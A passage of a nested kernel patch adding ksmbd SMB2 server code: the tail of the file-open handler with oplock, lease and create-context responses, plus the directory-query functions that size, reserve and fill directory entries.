++						kfree(pntsd);
++						goto err_out;
++					}
++
++					rc = ksmbd_vfs_set_sd_xattr(conn,
++								    user_ns,
++								    path.dentry,
++								    pntsd,
++								    pntsd_size);
++					kfree(pntsd);
++					if (rc)
++						pr_err("failed to store ntacl in xattr : %d\n",
++						       rc);
++				}
++			}
++		}
++		rc = 0;
++	}
++
++	if (stream_name) {
++		rc = smb2_set_stream_name_xattr(&path,
++						fp,
++						stream_name,
++						s_type);
++		if (rc)
++			goto err_out;
++		file_info = FILE_CREATED;
++	}
++
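++	/*
++	 * An attrib-only open requests nothing beyond attribute and
++	 * synchronize access; truncation and the oplock break below are
++	 * skipped for such opens.
++	 */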
++	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
++			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
++	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
++	    !fp->attrib_only && !stream_name) {
++		smb_break_all_oplock(work, fp);
++		need_truncate = 1;
++	}
++
++	/* fp should be searchable through ksmbd_inode.m_fp_list
++	 * after daccess, saccess, attrib_only, and stream are
++	 * initialized.
++	 */
++	write_lock(&fp->f_ci->m_lock);
++	list_add(&fp->node, &fp->f_ci->m_fp_list);
++	write_unlock(&fp->f_ci->m_lock);
++
++	/* Check delete pending among previous fp before oplock break */
++	if (ksmbd_inode_pending_delete(fp)) {
++		rc = -EBUSY;
++		goto err_out;
++	}
++
++	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
++	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
++	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
++	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
++		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
++			rc = share_ret;
++			goto err_out;
++		}
++	} else {
++		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
++			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
++			ksmbd_debug(SMB,
++				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
++				    name, req_op_level, lc->req_state);
++			rc = find_same_lease_key(sess, fp->f_ci, lc);
++			if (rc)
++				goto err_out;
++		} else if (open_flags == O_RDONLY &&
++			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
++			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
++			req_op_level = SMB2_OPLOCK_LEVEL_II;
++
++		rc = smb_grant_oplock(work, req_op_level,
++				      fp->persistent_id, fp,
++				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
++				      lc, share_ret);
++		if (rc < 0)
++			goto err_out;
++	}
++
++	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
++		ksmbd_fd_set_delete_on_close(fp, file_info);
++
++	if (need_truncate) {
++		rc = smb2_create_truncate(&path);
++		if (rc)
++			goto err_out;
++	}
++
++	if (req->CreateContextsOffset) {
++		struct create_alloc_size_req *az_req;
++
++		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
++					SMB2_CREATE_ALLOCATION_SIZE, 4);
++		if (IS_ERR(az_req)) {
++			rc = PTR_ERR(az_req);
++			goto err_out;
++		} else if (az_req) {
++			loff_t alloc_size;
++			int err;
++
++			if (le16_to_cpu(az_req->ccontext.DataOffset) +
++			    le32_to_cpu(az_req->ccontext.DataLength) <
++			    sizeof(struct create_alloc_size_req)) {
++				rc = -EINVAL;
++				goto err_out;
++			}
++			alloc_size = le64_to_cpu(az_req->AllocationSize);
++			ksmbd_debug(SMB,
++				    "request smb2 create allocate size : %llu\n",
++				    alloc_size);
++			smb_break_all_levII_oplock(work, fp, 1);
++			err = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
++					    alloc_size);
++			if (err < 0)
++				ksmbd_debug(SMB,
++					    "vfs_fallocate is failed : %d\n",
++					    err);
++		}
++
++		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out;
++		} else if (context) {
++			ksmbd_debug(SMB, "get query on disk id context\n");
++			query_disk_id = 1;
++		}
++	}
++
++	rc = ksmbd_vfs_getattr(&path, &stat);
++	if (rc)
++		goto err_out;
++
++	if (stat.result_mask & STATX_BTIME)
++		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
++	else
++		fp->create_time = ksmbd_UnixTimeToNT(stat.ctime);
++	if (req->FileAttributes || fp->f_ci->m_fattr == 0)
++		fp->f_ci->m_fattr =
++			cpu_to_le32(smb2_get_dos_mode(&stat, le32_to_cpu(req->FileAttributes)));
++
++	if (!created)
++		smb2_update_xattrs(tcon, &path, fp);
++	else
++		smb2_new_xattrs(tcon, &path, fp);
++
++	memcpy(fp->client_guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++
++	rsp->StructureSize = cpu_to_le16(89);
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	rsp->OplockLevel = opinfo != NULL ? opinfo->level : 0;
++	rcu_read_unlock();
++	rsp->Flags = 0;
++	rsp->CreateAction = cpu_to_le32(file_info);
++	rsp->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	rsp->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	rsp->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	rsp->ChangeTime = cpu_to_le64(time);
++	rsp->AllocationSize = S_ISDIR(stat.mode) ? 0 :
++		cpu_to_le64(stat.blocks << 9);
++	rsp->EndofFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	rsp->FileAttributes = fp->f_ci->m_fattr;
++
++	rsp->Reserved2 = 0;
++
++	rsp->PersistentFileId = fp->persistent_id;
++	rsp->VolatileFileId = fp->volatile_id;
++
++	rsp->CreateContextsOffset = 0;
++	rsp->CreateContextsLength = 0;
++	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1 */
++
++	/* If a lease was requested, send the lease context response */
++	if (opinfo && opinfo->is_lease) {
++		struct create_context *lease_ccontext;
++
++		ksmbd_debug(SMB, "lease granted on(%s) lease state 0x%x\n",
++			    name, opinfo->o_lease->state);
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
++
++		lease_ccontext = (struct create_context *)rsp->Buffer;
++		contxt_cnt++;
++		create_lease_buf(rsp->Buffer, opinfo->o_lease);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_lease_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_lease_size);
++		next_ptr = &lease_ccontext->Next;
++		next_off = conn->vals->create_lease_size;
++	}
++
++	if (maximal_access_ctxt) {
++		struct create_context *mxac_ccontext;
++
++		if (maximal_access == 0)
++			ksmbd_vfs_query_maximal_access(user_ns,
++						       path.dentry,
++						       &maximal_access);
++		mxac_ccontext = (struct create_context *)(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength));
++		contxt_cnt++;
++		create_mxac_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				le32_to_cpu(maximal_access));
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_mxac_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_mxac_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++		next_ptr = &mxac_ccontext->Next;
++		next_off = conn->vals->create_mxac_size;
++	}
++
++	if (query_disk_id) {
++		struct create_context *disk_id_ccontext;
++
++		disk_id_ccontext = (struct create_context *)(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength));
++		contxt_cnt++;
++		create_disk_id_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				stat.ino, tcon->id);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_disk_id_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_disk_id_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++		next_ptr = &disk_id_ccontext->Next;
++		next_off = conn->vals->create_disk_id_size;
++	}
++
++	if (posix_ctxt) {
++		contxt_cnt++;
++		create_posix_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				fp);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_posix_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_posix_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++	}
++
++	if (contxt_cnt > 0) {
++		rsp->CreateContextsOffset =
++			cpu_to_le32(offsetof(struct smb2_create_rsp, Buffer));
++	}
++
++err_out:
++	if (file_present || created)
++		path_put(&path);
++	ksmbd_revert_fsids(work);
++err_out1:
++	if (rc) {
++		if (rc == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (rc == -EOPNOTSUPP)
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		else if (rc == -EACCES || rc == -ESTALE || rc == -EXDEV)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (rc == -ENOENT)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
++		else if (rc == -EPERM)
++			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++		else if (rc == -EBUSY)
++			rsp->hdr.Status = STATUS_DELETE_PENDING;
++		else if (rc == -EBADF)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++		else if (rc == -ENOEXEC)
++			rsp->hdr.Status = STATUS_DUPLICATE_OBJECTID;
++		else if (rc == -ENXIO)
++			rsp->hdr.Status = STATUS_NO_SUCH_DEVICE;
++		else if (rc == -EEXIST)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
++		else if (rc == -EMFILE)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		if (!rsp->hdr.Status)
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++
++		if (fp)
++			ksmbd_fd_put(work, fp);
++		smb2_set_err_rsp(work);
++		ksmbd_debug(SMB, "Error response: %x\n", rsp->hdr.Status);
++	}
++
++	kfree(name);
++	kfree(lc);
++
++	return 0;
++}
++
++static int readdir_info_level_struct_sz(int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++		return sizeof(struct file_full_directory_info);
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++		return sizeof(struct file_both_directory_info);
++	case FILE_DIRECTORY_INFORMATION:
++		return sizeof(struct file_directory_info);
++	case FILE_NAMES_INFORMATION:
++		return sizeof(struct file_names_info);
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++		return sizeof(struct file_id_full_dir_info);
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++		return sizeof(struct file_id_both_directory_info);
++	case SMB_FIND_FILE_POSIX_INFO:
++		return sizeof(struct smb2_posix_info);
++	default:
++		return -EOPNOTSUPP;
++	}
++}
++
++static int dentry_name(struct ksmbd_dir_info *d_info, int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(ffdinfo->NextEntryOffset);
++		d_info->name = ffdinfo->FileName;
++		d_info->name_len = le32_to_cpu(ffdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fbdinfo->NextEntryOffset);
++		d_info->name = fbdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fbdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fdinfo->NextEntryOffset);
++		d_info->name = fdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fninfo->NextEntryOffset);
++		d_info->name = fninfo->FileName;
++		d_info->name_len = le32_to_cpu(fninfo->FileNameLength);
++		return 0;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(dinfo->NextEntryOffset);
++		d_info->name = dinfo->FileName;
++		d_info->name_len = le32_to_cpu(dinfo->FileNameLength);
++		return 0;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fibdinfo->NextEntryOffset);
++		d_info->name = fibdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fibdinfo->FileNameLength);
++		return 0;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++
++		posix_info = (struct smb2_posix_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(posix_info->NextEntryOffset);
++		d_info->name = posix_info->name;
++		d_info->name_len = le32_to_cpu(posix_info->name_len);
++		return 0;
++	}
++	default:
++		return -EINVAL;
++	}
++}
++
++/**
++ * smb2_populate_readdir_entry() - encode directory entry in smb2 response
++ * buffer
++ * @conn:	connection instance
++ * @info_level:	smb information level
++ * @d_info:	structure containing the variables for the query-dir state
++ * @ksmbd_kstat:	ksmbd wrapper of dirent stat information
++ *
++ * If the directory has many entries, a single find-first request cannot
++ * return them all; find-next may be called multiple times to read the
++ * remaining entries.
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
++				       struct ksmbd_dir_info *d_info,
++				       struct ksmbd_kstat *ksmbd_kstat)
++{
++	int next_entry_offset = 0;
++	char *conv_name;
++	int conv_len;
++	void *kstat;
++	int struct_sz, rc = 0;
++
++	conv_name = ksmbd_convert_dir_info_name(d_info,
++						conn->local_nls,
++						&conv_len);
++	if (!conv_name)
++		return -ENOMEM;
++
++	/* Somehow the name has only terminating NULL bytes */
++	if (conv_len < 0) {
++		rc = -EINVAL;
++		goto free_conv_name;
++	}
++
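++	/*
++	 * The info structs declare a one-byte FileName placeholder, hence
++	 * the -1 before adding the converted name length; each entry is
++	 * then padded to KSMBD_DIR_INFO_ALIGNMENT.
++	 */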
++	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
++	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
++	d_info->last_entry_off_align = next_entry_offset - struct_sz;
++
++	if (next_entry_offset > d_info->out_buf_len) {
++		d_info->out_buf_len = 0;
++		rc = -ENOSPC;
++		goto free_conv_name;
++	}
++
++	kstat = d_info->wptr;
++	if (info_level != FILE_NAMES_INFORMATION)
++		kstat = ksmbd_vfs_init_kstat(&d_info->wptr, ksmbd_kstat);
++
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)kstat;
++		ffdinfo->FileNameLength = cpu_to_le32(conv_len);
++		ffdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (ffdinfo->EaSize)
++			ffdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			ffdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(ffdinfo->FileName, conv_name, conv_len);
++		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)kstat;
++		fbdinfo->FileNameLength = cpu_to_le32(conv_len);
++		fbdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (fbdinfo->EaSize)
++			fbdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		fbdinfo->ShortNameLength = 0;
++		fbdinfo->Reserved = 0;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fbdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fbdinfo->FileName, conv_name, conv_len);
++		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)kstat;
++		fdinfo->FileNameLength = cpu_to_le32(conv_len);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fdinfo->FileName, conv_name, conv_len);
++		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)kstat;
++		fninfo->FileNameLength = cpu_to_le32(conv_len);
++		memcpy(fninfo->FileName, conv_name, conv_len);
++		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)kstat;
++		dinfo->FileNameLength = cpu_to_le32(conv_len);
++		dinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (dinfo->EaSize)
++			dinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		dinfo->Reserved = 0;
++		dinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			dinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(dinfo->FileName, conv_name, conv_len);
++		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)kstat;
++		fibdinfo->FileNameLength = cpu_to_le32(conv_len);
++		fibdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (fibdinfo->EaSize)
++			fibdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		fibdinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		fibdinfo->ShortNameLength = 0;
++		fibdinfo->Reserved = 0;
++		fibdinfo->Reserved2 = cpu_to_le16(0);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fibdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fibdinfo->FileName, conv_name, conv_len);
++		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++		u64 time;
++
++		posix_info = (struct smb2_posix_info *)kstat;
++		posix_info->Ignored = 0;
++		posix_info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
++		posix_info->ChangeTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->atime);
++		posix_info->LastAccessTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->mtime);
++		posix_info->LastWriteTime = cpu_to_le64(time);
++		posix_info->EndOfFile = cpu_to_le64(ksmbd_kstat->kstat->size);
++		posix_info->AllocationSize = cpu_to_le64(ksmbd_kstat->kstat->blocks << 9);
++		posix_info->DeviceId = cpu_to_le32(ksmbd_kstat->kstat->rdev);
++		posix_info->HardLinks = cpu_to_le32(ksmbd_kstat->kstat->nlink);
++		posix_info->Mode = cpu_to_le32(ksmbd_kstat->kstat->mode & 0777);
++		posix_info->Inode = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		posix_info->DosAttributes =
++			S_ISDIR(ksmbd_kstat->kstat->mode) ?
++				FILE_ATTRIBUTE_DIRECTORY_LE : FILE_ATTRIBUTE_ARCHIVE_LE;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			posix_info->DosAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		/*
++		 * SidBuffer(32) contains two SIDs (UNIX user SID(16) and
++		 * UNIX group SID(16)). A UNIX SID(16) = revision(1) +
++		 * num_subauth(1) + authority(6) +
++		 * sub_auth(4 * 1(num_subauth)) + RID(4).
++		 */
++		id_to_sid(from_kuid_munged(&init_user_ns, ksmbd_kstat->kstat->uid),
++			  SIDUNIX_USER, (struct smb_sid *)&posix_info->SidBuffer[0]);
++		id_to_sid(from_kgid_munged(&init_user_ns, ksmbd_kstat->kstat->gid),
++			  SIDUNIX_GROUP, (struct smb_sid *)&posix_info->SidBuffer[16]);
++		memcpy(posix_info->name, conv_name, conv_len);
++		posix_info->name_len = cpu_to_le32(conv_len);
++		posix_info->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++
++	} /* switch (info_level) */
++
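++	/* Advance the write cursor and running counters past the entry just emitted. */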
++	d_info->last_entry_offset = d_info->data_count;
++	d_info->data_count += next_entry_offset;
++	d_info->out_buf_len -= next_entry_offset;
++	d_info->wptr += next_entry_offset;
++
++	ksmbd_debug(SMB,
++		    "info_level : %d, buf_len :%d, next_offset : %d, data_count : %d\n",
++		    info_level, d_info->out_buf_len,
++		    next_entry_offset, d_info->data_count);
++
++free_conv_name:
++	kfree(conv_name);
++	return rc;
++}
++
++struct smb2_query_dir_private {
++	struct ksmbd_work	*work;
++	char			*search_pattern;
++	struct ksmbd_file	*dir_fp;
++
++	struct ksmbd_dir_info	*d_info;
++	int			info_level;
++};
++
++static void lock_dir(struct ksmbd_file *dir_fp)
++{
++	struct dentry *dir = dir_fp->filp->f_path.dentry;
++
++	inode_lock_nested(d_inode(dir), I_MUTEX_PARENT);
++}
++
++static void unlock_dir(struct ksmbd_file *dir_fp)
++{
++	struct dentry *dir = dir_fp->filp->f_path.dentry;
++
++	inode_unlock(d_inode(dir));
++}
++
++static int process_query_dir_entries(struct smb2_query_dir_private *priv)
++{
++	struct user_namespace	*user_ns = file_mnt_user_ns(priv->dir_fp->filp);
++	struct kstat		kstat;
++	struct ksmbd_kstat	ksmbd_kstat;
++	int			rc;
++	int			i;
++
++	for (i = 0; i < priv->d_info->num_entry; i++) {
++		struct dentry *dent;
++
++		if (dentry_name(priv->d_info, priv->info_level))
++			return -EINVAL;
++
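++		/* Hold the parent directory lock while looking up each name. */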
++		lock_dir(priv->dir_fp);
++		dent = lookup_one(user_ns, priv->d_info->name,
++				  priv->dir_fp->filp->f_path.dentry,
++				  priv->d_info->name_len);
++		unlock_dir(priv->dir_fp);
++
++		if (IS_ERR(dent)) {
++			ksmbd_debug(SMB, "Cannot lookup `%s' [%ld]\n",
++				    priv->d_info->name,
++				    PTR_ERR(dent));
++			continue;
++		}
++		if (unlikely(d_is_negative(dent))) {
++			dput(dent);
++			ksmbd_debug(SMB, "Negative dentry `%s'\n",
++				    priv->d_info->name);
++			continue;
++		}
++
++		ksmbd_kstat.kstat = &kstat;
++		if (priv->info_level != FILE_NAMES_INFORMATION)
++			ksmbd_vfs_fill_dentry_attrs(priv->work,
++						    user_ns,
++						    dent,
++						    &ksmbd_kstat);
++
++		rc = smb2_populate_readdir_entry(priv->work->conn,
++						 priv->info_level,
++						 priv->d_info,
++						 &ksmbd_kstat);
++		dput(dent);
++		if (rc)
++			return rc;
++	}
++	return 0;
++}
++
++static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
++				   int info_level)
++{
++	int struct_sz;
++	int conv_len;
++	int next_entry_offset;
++
++	struct_sz = readdir_info_level_struct_sz(info_level);
++	if (struct_sz == -EOPNOTSUPP)
++		return -EOPNOTSUPP;
++
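++	/* Reserve room for the UTF-16 conversion: two bytes per character plus a terminator. */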
++	conv_len = (d_info->name_len + 1) * 2;
++	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
++				  KSMBD_DIR_INFO_ALIGNMENT);
++
++	if (next_entry_offset > d_info->out_buf_len) {
++		d_info->out_buf_len = 0;
++		return -ENOSPC;
++	}
++
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)d_info->wptr;
++		memcpy(ffdinfo->FileName, d_info->name, d_info->name_len);
++		ffdinfo->FileName[d_info->name_len] = 0x00;
++		ffdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)d_info->wptr;
++		memcpy(fbdinfo->FileName, d_info->name, d_info->name_len);
++		fbdinfo->FileName[d_info->name_len] = 0x00;
++		fbdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)d_info->wptr;
++		memcpy(fdinfo->FileName, d_info->name, d_info->name_len);
++		fdinfo->FileName[d_info->name_len] = 0x00;
++		fdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)d_info->wptr;
++		memcpy(fninfo->FileName, d_info->name, d_info->name_len);
++		fninfo->FileName[d_info->name_len] = 0x00;
++		fninfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)d_info->wptr;
++		memcpy(dinfo->FileName, d_info->name, d_info->name_len);
++		dinfo->FileName[d_info->name_len] = 0x00;
++		dinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)d_info->wptr;
++		memcpy(fibdinfo->FileName, d_info->name, d_info->name_len);
++		fibdinfo->FileName[d_info->name_len] = 0x00;
++		fibdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
++		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++
++		posix_info = (struct smb2_posix_info *)d_info->wptr;
++		memcpy(posix_info->name, d_info->name, d_info->name_len);
++		posix_info->name[d_info->name_len] = 0x00;
++		posix_info->name_len = cpu_to_le32(d_info->name_len);
++		posix_info->NextEntryOffset =
++			cpu_to_le32(next_entry_offset);
++		break;
++	}
++	} /* switch (info_level) */
++
++	d_info->num_entry++;
++	d_info->out_buf_len -= next_entry_offset;
++	d_info->wptr += next_entry_offset;
++	return 0;
++}
++
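++/*
++ * dir_context actor invoked by iterate_dir() for each directory entry:
++ * skip "." and "..", vetoed names, and names that do not match the
++ * search pattern, then reserve buffer space for the entry. Returning
++ * false stops the iteration.
++ */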
++static bool __query_dir(struct dir_context *ctx, const char *name, int namlen,
++		       loff_t offset, u64 ino, unsigned int d_type)
++{
++	struct ksmbd_readdir_data	*buf;
++	struct smb2_query_dir_private	*priv;
++	struct ksmbd_dir_info		*d_info;
++	int				rc;
++
++	buf	= container_of(ctx, struct ksmbd_readdir_data, ctx);
++	priv	= buf->private;
++	d_info	= priv->d_info;
++
++	/* dot and dotdot entries are already reserved */
++	if (!strcmp(".", name) || !strcmp("..", name))
++		return true;
++	if (ksmbd_share_veto_filename(priv->work->tcon->share_conf, name))
++		return true;
++	if (!match_pattern(name, namlen, priv->search_pattern))
++		return true;
++
++	d_info->name		= name;
++	d_info->name_len	= namlen;
++	rc = reserve_populate_dentry(d_info, priv->info_level);
++	if (rc)
++		return false;
++	if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY)
++		d_info->out_buf_len = 0;
++	return true;
++}
++
++static int verify_info_level(int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	case FILE_DIRECTORY_INFORMATION:
++	case FILE_NAMES_INFORMATION:
